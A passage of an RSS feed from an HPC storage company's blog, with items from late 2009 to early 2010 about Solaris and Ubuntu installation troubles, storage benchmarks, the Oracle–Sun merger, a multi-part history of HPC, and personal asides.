      <link>https://blog.scalability.org/2010/02/back-in-the-saddle-arrived-from-florida-to-8-inches-of-snow-on-my-driveway/</link>
      <pubDate>Tue, 23 Feb 2010 17:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/back-in-the-saddle-arrived-from-florida-to-8-inches-of-snow-on-my-driveway/</guid>
      <description>Yeah &amp;hellip; that was fun. Back at work. Things have been busy.</description>
    </item>
    
    <item>
      <title>BTW:  I am out on vacation (holiday for most of the non-US world) ... working ... iphone ... yadda yadda</title>
      <link>https://blog.scalability.org/2010/02/btw-i-am-out-on-vacation-holiday-for-most-of-the-non-us-world-working-iphone-yadda-yadda/</link>
      <pubDate>Tue, 16 Feb 2010 03:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/btw-i-am-out-on-vacation-holiday-for-most-of-the-non-us-world-working-iphone-yadda-yadda/</guid>
      <description>Spent several days in Orlando Florida (the house of mouse), and today drove to Key West, after a short stop in Miami to visit a friend, his wife, and their newly 1 year old daughter. Of course, upon getting to Key West, first our hotel door wouldn&amp;rsquo;t open, and then when we figured out the trick with the help of the hotel person, we inserted our card into the door, and the lights went out on the Island.</description>
    </item>
    
    <item>
      <title>OpenSolaris 10 (9.06) is pretty good for a task we had tested it with</title>
      <link>https://blog.scalability.org/2010/02/opensolaris-10-9-06-is-pretty-good-for-a-task-we-had-tested-it-with/</link>
      <pubDate>Tue, 16 Feb 2010 03:12:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/opensolaris-10-9-06-is-pretty-good-for-a-task-we-had-tested-it-with/</guid>
      <description>I&amp;rsquo;ll describe it more later, but this will be showing up in our siCluster units in short order. Some experiments we did on this over the past week have met with a resounding success, and give us a level of flexibility that I hadn&amp;rsquo;t anticipated before. Now, if I can figure out how to integrate Tiburon and Jumpstart (launch Jumpstart from Tiburon), or figure out how to provision OpenSolaris systems over PXE boot.</description>
    </item>
    
    <item>
      <title>On the joys of attempting to get Solaris 10 u8 installed on a JR4</title>
      <link>https://blog.scalability.org/2010/02/on-the-joys-of-attempting-to-get-solaris-10-u8-installed-on-a-jr4/</link>
      <pubDate>Wed, 10 Feb 2010 05:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/on-the-joys-of-attempting-to-get-solaris-10-u8-installed-on-a-jr4/</guid>
      <description>A customer wants to test this. We want to load it for them. As we have discovered in the process &amp;hellip;. &amp;hellip; Solaris 10 (not OpenSolaris) doesn&amp;rsquo;t like SATA DVD drives. Since the motherboard has no IDE drive, we are SOL there. But wait, can&amp;rsquo;t we use a nice shiny USB DVD drive? No dice. Doesn&amp;rsquo;t work. &amp;hellip; ok What about a PXE boot load? Lets make it nice and simple.</description>
    </item>
    
    <item>
      <title>[updated]  latency characteristics for the SDR Mellanox card MT25204</title>
      <link>https://blog.scalability.org/2010/02/bad-latency-characteristics-for-the-sdr-mellanox-card-mt25204/</link>
      <pubDate>Tue, 09 Feb 2010 15:55:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/bad-latency-characteristics-for-the-sdr-mellanox-card-mt25204/</guid>
      <description>[update] This was a PCI contention issue. The customer&amp;rsquo;s original code and test cases did not tickle this performance feature. Their next code did. ConnectX was designed to handle codes of the latter type. It&amp;rsquo;s also quite dangerous to take as gospel any of the output of diagnostic programs without their context. And if you are a vendor, and you have a customer reporting things like this, have a careful look at what they are doing.</description>
    </item>
    
    <item>
      <title>OT:  some security incident this morning at Detroit Metro Airport (DTW)</title>
      <link>https://blog.scalability.org/2010/02/ot-some-security-incident-this-morning-at-detroit-metro-airport-dtw/</link>
      <pubDate>Mon, 08 Feb 2010 14:23:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/ot-some-security-incident-this-morning-at-detroit-metro-airport-dtw/</guid>
      <description>Few details. My wife heard a report from an eye-witness to it. Nothing concrete yet, nothing I can definitively report. What was told to me was that the incident was in the concourse, security tried to apprehend someone, and they were eventually walked out. I also heard something about a police officer carrying something &amp;ldquo;with wires hanging out&amp;rdquo;. Hopefully we will hear something soon.</description>
    </item>
    
    <item>
      <title>revamping the day-job&#39;s web store</title>
      <link>https://blog.scalability.org/2010/02/revamping-the-day-jobs-web-store/</link>
      <pubDate>Sat, 06 Feb 2010 21:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/revamping-the-day-jobs-web-store/</guid>
      <description>Our webstore has been a good thing for us to implement, it has driven purchases (more indirectly than directly). But it is somewhat hard to maintain, and causes significant issues when we want to update it. Moreover, it&amp;rsquo;s not sufficiently flexible that people can configure specific systems on it, such as siCluster. So we are revamping it. Rethinking some of the basic bits. Hopefully these bits of re-thinking will result in a better experience for everyone.</description>
    </item>
    
    <item>
      <title>Interesting results from Microsoft&#39;s SQLio benchmark on JR4</title>
      <link>https://blog.scalability.org/2010/02/interesting-results-from-microsofts-sqlio-benchmark-on-jr4/</link>
      <pubDate>Sat, 06 Feb 2010 21:33:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/interesting-results-from-microsofts-sqlio-benchmark-on-jr4/</guid>
      <description>I&amp;rsquo;ll have the full set of numbers soon from the tests our customer was running on their shiny new JR4 (they agreed to let us talk about them). One of the more interesting take-aways is that the 24 drive unit appears to provide something a bit north of 5000 IOPs in a number of the random tests, doing seeks on files larger than ram. I need to think this through somewhat.</description>
    </item>
    
    <item>
      <title>Why is it that I get more work done on a saturday at the office than all week long at the office?</title>
      <link>https://blog.scalability.org/2010/02/why-is-it-that-i-get-more-work-done-on-a-saturday-at-the-office-than-all-week-long-at-the-office/</link>
      <pubDate>Sat, 06 Feb 2010 21:25:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/why-is-it-that-i-get-more-work-done-on-a-saturday-at-the-office-than-all-week-long-at-the-office/</guid>
      <description>No &amp;hellip; seriously. I solved 2 long standing issues today, one for an internal system now running 12 cores and 32 GB ram (needed a bios update), and the other was fixing the ()&amp;amp;&amp;amp;%%$^%(*&amp;amp; problems with a set of GA180 cards. I dunno, I think the issue is that I have ample time to think without interruption. The family is off swimming (wish I were with them), but getting this done is important.</description>
    </item>
    
    <item>
      <title>Did Ubuntu jump the shark in 9.10?  Yeah ... they did.</title>
      <link>https://blog.scalability.org/2010/02/did-ubuntu-jump-the-shark-in-9-10-yeah-they-did/</link>
      <pubDate>Wed, 03 Feb 2010 01:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/02/did-ubuntu-jump-the-shark-in-9-10-yeah-they-did/</guid>
      <description>List of things they changed is long. Some major ones &amp;hellip; some &amp;hellip; I dunno &amp;hellip; bad ideas mebbe? like Grub2? Like incompatibilities with various motherboards (struggling with this right now on a home machine rebuild). Like unchangeable login windows, and crappy icons for power, mail, volume, unchangeable options in gnome &amp;hellip; the xorg config debacle. I could go on. The big one is the nVidia issue. Install restricted drivers. Sure.</description>
    </item>
    
    <item>
      <title>Working on marketing materials for siCluster, new benchmark reports, ...</title>
      <link>https://blog.scalability.org/2010/01/working-on-marketing-materials-for-sicluster-new-benchmark-reports/</link>
      <pubDate>Sat, 30 Jan 2010 14:03:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/working-on-marketing-materials-for-sicluster-new-benchmark-reports/</guid>
      <description>We are developing some marketing materials and pages for our siCluster systems. Also some new internal benchmark reports on JackRabbit, DeltaV, and other tools. Also, we have some contracts we are working on to supply some new benchmarks of some announced/delivered and announced/not-currently shipping chips. Have a variety of new things showing up in the lab &amp;hellip; would love to have the time to play with them &amp;hellip; will start our automated testing bits for now.</description>
    </item>
    
    <item>
      <title>Ruminations on performance ... the possible, the impossible, and things in between</title>
      <link>https://blog.scalability.org/2010/01/ruminations-on-performance-the-possible-the-impossible-and-things-in-between/</link>
      <pubDate>Sat, 30 Jan 2010 13:51:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/ruminations-on-performance-the-possible-the-impossible-and-things-in-between/</guid>
      <description>We are often asked what differentiates us from our competition. One of the more important aspects is our raw uncompromising performance. Our systems are fast. Not in a marketing number sense (I&amp;rsquo;ll get to this in a minute). But in real application fast. We take a no holds barred approach to performance design. And our customers do see this. Design, implementation, &amp;hellip; these are critical elements. Software stack, tuning &amp;hellip;. these are critical.</description>
    </item>
    
    <item>
      <title>Again, tremendously busy ... lots I want to write about</title>
      <link>https://blog.scalability.org/2010/01/again-tremendously-busy-lots-i-want-to-write-about/</link>
      <pubDate>Sat, 30 Jan 2010 11:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/again-tremendously-busy-lots-i-want-to-write-about/</guid>
      <description>please do bear with me.</description>
    </item>
    
    <item>
      <title>Sunacle ... Orasun ... the saga continues ...</title>
      <link>https://blog.scalability.org/2010/01/sunacle-orasun-the-saga-continues/</link>
      <pubDate>Wed, 27 Jan 2010 16:56:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/sunacle-orasun-the-saga-continues/</guid>
      <description>It does seem that Larry Ellison and his team are focused where they think Sun&amp;rsquo;s real value lies. From an article today in The Register, some of these plans are showing up in the press. For those not sure if things are done with, the JAVA symbol appears to be going, going &amp;hellip; gone. You can still find a few remnants here. And in one of its last 10-Q filings, here. As I noted previously, Oracle isn&amp;rsquo;t dumb.</description>
    </item>
    
    <item>
      <title>The &#34;pony&#34; scale</title>
      <link>https://blog.scalability.org/2010/01/the-pony-scale/</link>
      <pubDate>Tue, 26 Jan 2010 07:25:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/the-pony-scale/</guid>
      <description>We get RFPs all the time. Some of these RFPs are genuine &amp;ldquo;show us good things so we can consider them.&amp;rdquo; Many are &amp;ldquo;we really want to buy something quite specific, but the rules won&amp;rsquo;t let us specify that.&amp;rdquo; Some of them have requirements or limits that make me think of a kid saying &amp;hellip; &amp;ldquo;and I want a pony too&amp;rdquo;. Such RFPs usually have a combination of reasonable sounding elements, right up to the point where they demand the pony.</description>
    </item>
    
    <item>
      <title>OT:  Joe&#39;s weekend adventure ... bo kata, sparring ...</title>
      <link>https://blog.scalability.org/2010/01/ot-joes-weekend-adventure-bo-kata-sparring/</link>
      <pubDate>Sun, 24 Jan 2010 17:38:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/ot-joes-weekend-adventure-bo-kata-sparring/</guid>
      <description>I had some karate fun over the weekend, participating at a tournament in Michigan. First tournament, never done this before. Ok, in high school, I did wrestling. Same long waits punctuated by fast action, in a make or break mode. The school I attend is here. Great instructors, nearly infinite patience for newbies like me. As long as I don&amp;rsquo;t screw up the player, here is the bo kata. I took second place in the over 35 group (and in the 18-34 group &amp;hellip; long story, don&amp;rsquo;t ask, but I am happy to have done better than some of them young whippersnappers :) ) I&amp;rsquo;ll put the sparring video up later.</description>
    </item>
    
    <item>
      <title>Sun-acle ... Orasun ... Java ...</title>
      <link>https://blog.scalability.org/2010/01/sun-acle-orasun-java/</link>
      <pubDate>Thu, 21 Jan 2010 15:51:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/sun-acle-orasun-java/</guid>
      <description>The acquisition has been given a green light in Europe. Now &amp;hellip; what this means, after nearly 10 months of uncertainty, to Sun&amp;rsquo;s remaining customers, the ones that haven&amp;rsquo;t fled to other vendors, may be a moot question. What this means to various markets is also unknown. We haven&amp;rsquo;t seen much focus from Oracle on HPC. Indeed, this is a tiny market for Sun (it&amp;rsquo;s not their forte), and given that Sun will be a small part of Oracle &amp;hellip;</description>
    </item>
    
    <item>
      <title>Hmmm ... I thought I was the only one who thought the Microsoft bots were aggressive ..</title>
      <link>https://blog.scalability.org/2010/01/hmmm-i-thought-i-was-the-only-one-who-thought-the-microsoft-bots-were-aggressive/</link>
      <pubDate>Mon, 18 Jan 2010 11:38:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hmmm-i-thought-i-was-the-only-one-who-thought-the-microsoft-bots-were-aggressive/</guid>
      <description>In this article on H-online, they noticed that the Microsoft bots are &amp;hellip; er &amp;hellip; aggressive. In the past, we&amp;rsquo;ve had to disable their 65.55.x.* access to our sites as they did not respect robots.txt. In the past year or so, they have behaved generally well, though we do notice the occasional blip. I suspect that their crawlers aren&amp;rsquo;t terribly smart. Google&amp;rsquo;s, yahoo&amp;rsquo;s, and many others are pretty sophisticated. No real problems with them anymore.</description>
    </item>
    
    <item>
      <title>Blown away at how annoying software installation is, on windows</title>
      <link>https://blog.scalability.org/2010/01/blown-away-at-how-annoying-software-installation-is-on-windows/</link>
      <pubDate>Mon, 18 Jan 2010 01:13:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/blown-away-at-how-annoying-software-installation-is-on-windows/</guid>
      <description>I&amp;rsquo;ve argued that RPM &amp;hellip; well &amp;hellip; building RPMs is bothersome, in part because RPM is a moving target. It&amp;rsquo;s hard to actually build a reasonable package that works correctly on all RPM based or accessible distributions. But this is nothing compared to the pain that windows people feel. I never knew how much of a stinking pile of week old bits that windows software installation was &amp;hellip; that is &amp;hellip; until I needed to install a package, a simple basic storage controller package &amp;hellip; on a windows 2008 x64 server.</description>
    </item>
    
    <item>
      <title>Yeah, I blowed up da motherboard ... in the central server</title>
      <link>https://blog.scalability.org/2010/01/yeah-i-blowed-up-da-motherboard-in-the-central-server/</link>
      <pubDate>Sat, 16 Jan 2010 19:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/yeah-i-blowed-up-da-motherboard-in-the-central-server/</guid>
      <description>Yuppers. Updated the bios for the brand new 6 core AMD chips. And whammo. Motherboard was toast. Yessiree toast. A door jam. A square frisbee. So I swapped it out for a motherboard we are using for testing. On the plus side, scalableinformatics.com is now being served by a shiny new Nehalem E5504. On the down side &amp;hellip; I have a new square hockey puck. The exact same size and shape as the motherboard which used to be in Scalableinformatics.</description>
    </item>
    
    <item>
      <title>Been busy ... as usual</title>
      <link>https://blog.scalability.org/2010/01/been-busy-as-usual/</link>
      <pubDate>Sun, 10 Jan 2010 17:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/been-busy-as-usual/</guid>
      <description>The year is going hard and fast, right out of the gate. Multiple RFPs and new customers. New bits of business left and right. And let&amp;rsquo;s not forget the support side &amp;hellip; this is using up lots of time as well. Sales hire is almost done &amp;hellip; not to offload, but to augment. Need to do a technical hire too, soon. More around Tuesday. I have some documentation I have to finish up, and rerun a whole lotta benchmarks for some customers.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 7</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-7/</link>
      <pubDate>Sun, 03 Jan 2010 19:20:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-7/</guid>
      <description>Storage changes In the beginning of the millennium, Fibre Channel ruled the roost. Nothing could touch it. SATA and SAS were a ways away. SCSI was used in smaller storage systems. Networked storage meant a large central server with ports. SANs were on the rise. In HPC you have to move lots of data. Huge amounts of data. Performance bottlenecks are no fun. FC is a slow technology. It is designed to connect as many disks as you can together for SAN architecture.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 6</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-6/</link>
      <pubDate>Sun, 03 Jan 2010 16:39:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-6/</guid>
      <description>The recycling of an older business model using newer technology ASPs began the decade promising to reduce OPEX and CAPEX for HPC systems. They flamed out, badly, as they really didn&amp;rsquo;t meet their promise, and you had all these nasty issues of data motion, security, jurisdiction, software licenses, utilization, and compatibility. The concept itself wasn&amp;rsquo;t bad, create an external data center where you can run stuff, and pay for what you use.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 5</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-5/</link>
      <pubDate>Sun, 03 Jan 2010 15:56:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-5/</guid>
      <description>Accelerators in HPC &amp;hellip; In 2002, my business partner (he wasn&amp;rsquo;t then), showed me these Cradle SOC chips. 40 cores or something like that, on a single chip, in 2002 time frame. My comment to him was, we should figure out a way to put a whole helluva lotta them (e.g. many chips with RAM etc) onto PCI cards, with programming environments. Make them easy to use. Easy to program. We spent the next 2-3 years looking at a bunch of architectures, a bunch of chips.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 4</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-4/</link>
      <pubDate>Sun, 03 Jan 2010 15:52:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-4/</guid>
      <description>The impact of markets, and government upon HPC &amp;hellip; While the charts from top500.org are nice, they don&amp;rsquo;t tell everything that happened in this interval. We had 3 recessions, 2 major (2001 and the &amp;ldquo;Great Recession&amp;rdquo;) and 1 minor one. We had significant changes in research funding from the US federal government &amp;hellip; a refocusing of DARPA on things less HPC specific. These elements all contributed to the trajectory within the decade.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 3</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-3/</link>
      <pubDate>Sun, 03 Jan 2010 15:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-3/</guid>
      <description>The relentless onslaught of clusters &amp;hellip; We were also mostly doing SMPs and MPPs then. Clusters were barely registering. See the chart and the data to get more perspective. What happened in the market was a simple alteration of the cost scale per flop. Clusters provided massive numbers of cheap cycles. Add to this that MPI had been standardized, was reasonably well designed, and people were migrating codes to it. Funny, MPI on a cluster runs just as nicely as MPI on the SGI.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 2</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-2/</link>
      <pubDate>Sun, 03 Jan 2010 15:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-2/</guid>
      <description>The death of RISC &amp;hellip;
obligatory Monty Python Holy Grail quote: old man: I&amp;rsquo;m not dead yet, I think I&amp;rsquo;ll go for a walk John Cleese: Look, you are not fooling anyone &amp;hellip;
The RISC vendors (SGI, HP, IBM, &amp;hellip;) realized that RISC was dead, and that EPIC would be the technology that killed it. I was at SGI at the time, and disagreed that EPIC (Itanium) was going to be the killer.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millennium: a perspective, part 1</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-1/</link>
      <pubDate>Sun, 03 Jan 2010 15:45:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-1/</guid>
      <description>[Update: 9-Jan-2010] Link fixed, thanks Shehjar! This is sort of another itch I need to scratch. Please bear with me. This is a long read, and I am breaking it up into multiple posts so you don&amp;rsquo;t have to read this as a huge novel in and of itself. Many excellent blogs and news sites are giving perspectives on 2009. Magazine sites are talking about the hits in HPC over the last year in computing, storage, networking.</description>
    </item>
    
    <item>
      <title>pbzip2, how do I love thee?  Let me count the ways ...</title>
      <link>https://blog.scalability.org/2010/01/pbzip2-how-do-i-love-thee-let-me-count-the-ways/</link>
      <pubDate>Sat, 02 Jan 2010 23:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/pbzip2-how-do-i-love-thee-let-me-count-the-ways/</guid>
      <description>dstat output on a 10GB pbzip2 compressed file being uncompressed &amp;hellip; with pbzip2.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
 49   3  42   5   0   0|  35M   95M|3168B 6978B|   0    28k|1575  1198
 52   4  39   5   0   0|  39M  188M|2508B 5230B|   0    80k|1769  1475
 51   4  40   5   0   0|  19M  206M|4686B 9390B|   0     0 |2396  2240
 42   4  48   5   0   0|  31M  158M|3054B 5360B|   0    16k|1820  2025
 50   5  40   5   0   0|  37M  115M|2640B 5360B|   0   104k|1731  1564
 38   4  50   8   0   0|  24M  105M|3102B 6270B|   0     0 |1639  1477
^C

Run &amp;hellip; don&amp;rsquo;t walk &amp;hellip; to get pbzip2.</description>
    </item>
    
    <item>
      <title>Non-theatrical security</title>
      <link>https://blog.scalability.org/2009/12/non-theatrical-security/</link>
      <pubDate>Mon, 28 Dec 2009 09:56:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/non-theatrical-security/</guid>
      <description>As it turns out, a good friend was on that Northwest flight. I won&amp;rsquo;t identify him (though I know he reads this blog occasionally). What happened to him has made me think of my own responses in such a scenario. But it has also made me question the TSA&amp;rsquo;s knee-jerk, ineffective new guidelines. Especially in light of this report, which, if true, suggests that real security measures ought to be taken.</description>
    </item>
    
    <item>
      <title>Oh. Yeah.</title>
      <link>https://blog.scalability.org/2009/12/oh-yeah/</link>
      <pubDate>Sun, 27 Dec 2009 04:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/oh-yeah/</guid>
      <description>Two days ago, some nutjob wanted to blow up an airplane 20 minutes out from the airport I live 15 minutes from. Said nutjob is apparently in a hospital in Ann Arbor, again, 20 minutes away from us. Today, the TSA is closing the barn doors after all the horses have left. I am going to follow their train of illogic to its inevitable conclusion. At some point in time in the future, our TSA won&amp;rsquo;t allow planes to take off and land until all passengers are in a chemically induced coma.</description>
    </item>
    
    <item>
      <title>simple minded sprints with JackRabbit Flash</title>
      <link>https://blog.scalability.org/2009/12/simple-minded-sprints-with-jackrabbit-flash/</link>
      <pubDate>Mon, 21 Dec 2009 00:03:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/simple-minded-sprints-with-jackrabbit-flash/</guid>
      <description>A quick and dirty test on a JackRabbit Flash machine. This is a machine going to a proof of concept project soon. A simple 8k random read against 256GB data spread out over 4 volumes. 1 machine. 48GB ram. Open up the throttle on the stock config. Engines aren&amp;rsquo;t running at full speed, but its a baseline test.
random: (groupid=0, jobs=256): err= 0: pid=18717
  read : io=262144MB, bw=733052KB/s, iops=91631, runt=366189msec
    clat (usec): min=296, max=184778, avg=2777.</description>
    </item>
    
    <item>
      <title>What I really want to do is to disable device-mapper on install ...</title>
      <link>https://blog.scalability.org/2009/12/what-i-really-want-to-do-is-to-disable-device-mapper-on-install/</link>
      <pubDate>Sun, 20 Dec 2009 15:35:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/what-i-really-want-to-do-is-to-disable-device-mapper-on-install/</guid>
      <description>Sometimes &amp;hellip; sometimes &amp;hellip; helpful utilities are helpful. Like installation systems that present the raw hardware with drivers to me, and let ME decide what I want to do with them. Unfortunately &amp;hellip; I often run head first into bad choices made by the installer coders or architects. Dm-raid is one of these cases. It is very hard to disable it from a Centos install. Very hard. Pretty close to damn near impossible.</description>
    </item>
    
    <item>
      <title>Interview from SC09 posted at techinsight.tv</title>
      <link>https://blog.scalability.org/2009/12/interview-from-sc09-posted-at-techinsight-tv/</link>
      <pubDate>Sun, 13 Dec 2009 20:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/interview-from-sc09-posted-at-techinsight-tv/</guid>
      <description>I did a few interviews, ranging from bloggers through journalists. This interview is one of the mix. By all means, please do go to their site and see it, and their text around it.
I had much more to say; this is an edited-down version. Basically I ran the Kx kdb+ demo, the dd demo, and a few other demos while talking. Doug was off on my right, probably laughing at me as I jumbled some things up &amp;hellip; The hand bit?</description>
    </item>
    
    <item>
      <title>Ceph client nearly ready to go into kernel ...</title>
      <link>https://blog.scalability.org/2009/12/ceph-client-nearly-ready-to-go-into-kernel/</link>
      <pubDate>Sun, 13 Dec 2009 20:05:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/ceph-client-nearly-ready-to-go-into-kernel/</guid>
      <description>Sage Weil has posted on this. Ceph is a distributed file system, with an MDS and a few other things, that looks quite interesting. Not necessarily on the high performance side, but on the simple object storage side. The client going into 2.6.33 could be quite interesting. Pay attention to Ceph. Think of Lustre, without the nasty kernel requirements on server and client, and with in-kernel support. Including Ceph within the kernel (the second!</description>
    </item>
    
    <item>
      <title>The danger of controlling too much of your stack ...</title>
      <link>https://blog.scalability.org/2009/12/the-danger-of-controlling-too-much-of-your-stack/</link>
      <pubDate>Thu, 10 Dec 2009 01:54:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/the-danger-of-controlling-too-much-of-your-stack/</guid>
      <description>This is related to an issue we ran into today, and several other times. It sounds strange, but if you maintain rigid control over a huge swath of your stack, you run a fairly serious risk of being unable to respond to changing environments as quickly as your competition. The law of unintended consequences bites you, fairly hard. Worse, you rarely, if ever, realize it, until it is too late.</description>
    </item>
    
    <item>
      <title>Just one of them days ...</title>
      <link>https://blog.scalability.org/2009/12/just-one-of-them-days/</link>
      <pubDate>Wed, 09 Dec 2009 01:55:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/just-one-of-them-days/</guid>
      <description>We had a bunch of parts overnighted so we could start building some machines. Turns out one critical part for mounting the heat sinks was missing. If that part doesn&amp;rsquo;t arrive tomorrow, we&amp;rsquo;ll have to do a workaround near term, and worst case, use a slightly different MB/mount for this, as we have that part for that MB. Do-able for this unit, but annoying as all heck. And of course it is time critical.</description>
    </item>
    
    <item>
      <title>Just too funny ...</title>
      <link>https://blog.scalability.org/2009/12/just-too-funny-2/</link>
      <pubDate>Tue, 08 Dec 2009 14:34:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/just-too-funny-2/</guid>
      <description>XKCD comic from a few days ago &amp;hellip;
[ ](http://www.xkcd.com/)
reminds me of the spherical horse joke I used to tell &amp;hellip; For those not in the know, physicists like to reduce complex problems to simpler problems, solve the simpler problem &amp;hellip; so when designing a faster race-horse, why not make the horse spherical rather than its equine shape, figure out what slows down a spherical horse, then that should be similar for the equine shaped horse &amp;hellip; right?</description>
    </item>
    
    <item>
      <title>Perl 6 looks quite good</title>
      <link>https://blog.scalability.org/2009/12/perl-6-looks-quite-good/</link>
      <pubDate>Sun, 06 Dec 2009 20:21:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/perl-6-looks-quite-good/</guid>
      <description>I had a chance to look at the perl 6 advent calendar. What caught my eye was yesterdays post. In it, meta operators are explained. So here is a common HPC pattern, a reduction operation. Say a sum reduction. Suppose you want to sum up the values in some vector A. In Perl, A would be represented by a list, @a. To get the sum over the elements, you can do this: $sum = [+] @a; which means apply the sum operator &amp;ldquo;+&amp;rdquo;, between elements of the list.</description>
    </item>
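The `[+] @a` reduction described in the summary above generalizes to any infix operator. As a rough cross-language analogue (a Python sketch, not from the original post; the list values are arbitrary), the same fold-an-operator-between-elements pattern looks like:

```python
from functools import reduce
import operator

# Hypothetical data; in the Perl 6 example this is the list @a.
a = [1, 2, 3, 4, 5]

# Perl 6: $sum = [+] @a;  -- fold "+" between successive elements.
total = reduce(operator.add, a)    # 1 + 2 + 3 + 4 + 5
print(total)                       # 15

# The meta-operator works for any infix operator, e.g. [*] @a:
product = reduce(operator.mul, a)  # 1 * 2 * 3 * 4 * 5
print(product)                     # 120
```

The difference is that Perl 6 derives `[op]` automatically for every infix `op`, while here the operator has to be passed explicitly to the fold.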
    
    <item>
      <title>Day job will be opening a technical sales position shortly ...</title>
      <link>https://blog.scalability.org/2009/12/day-job-will-be-opening-a-technical-sales-position-shortly/</link>
      <pubDate>Sat, 05 Dec 2009 14:52:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/day-job-will-be-opening-a-technical-sales-position-shortly/</guid>
      <description>See the day job site for details soon (next week?) for the posting.</description>
    </item>
    
    <item>
      <title>This year is one for the record books ...</title>
      <link>https://blog.scalability.org/2009/12/this-year-is-one-for-the-record-books/</link>
      <pubDate>Thu, 03 Dec 2009 17:55:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/this-year-is-one-for-the-record-books/</guid>
      <description>We passed an important milestone today. Well, ok, we passed it earlier in the week. But this is our best year to date on record. And the year isn&amp;rsquo;t over &amp;hellip; still 28 days left &amp;hellip;.</description>
    </item>
    
    <item>
      <title>siCluster decloaking</title>
      <link>https://blog.scalability.org/2009/12/sicluster-decloaking/</link>
      <pubDate>Wed, 02 Dec 2009 18:41:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/sicluster-decloaking/</guid>
      <description>The day job pushed the announcement which went into the SC09 PR black hole out the door today. The first installation is also indicated in the next announcement &amp;hellip; Scalable Informatics Introduces siCluster, an Innovative and Highly Scalable Performance Storage Cluster Canton, MI, Dec 2, 2009 - Scalable Informatics Inc., a provider of innovative high performance storage and computing solutions, announces the availability of their new siCluster&amp;trade; storage cluster product (http://scalableinformatics.</description>
    </item>
    
    <item>
      <title>I am not sure I should be amused, but I am ...</title>
      <link>https://blog.scalability.org/2009/12/i-am-not-sure-i-should-be-amused-but-i-am/</link>
      <pubDate>Wed, 02 Dec 2009 14:57:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/i-am-not-sure-i-should-be-amused-but-i-am/</guid>
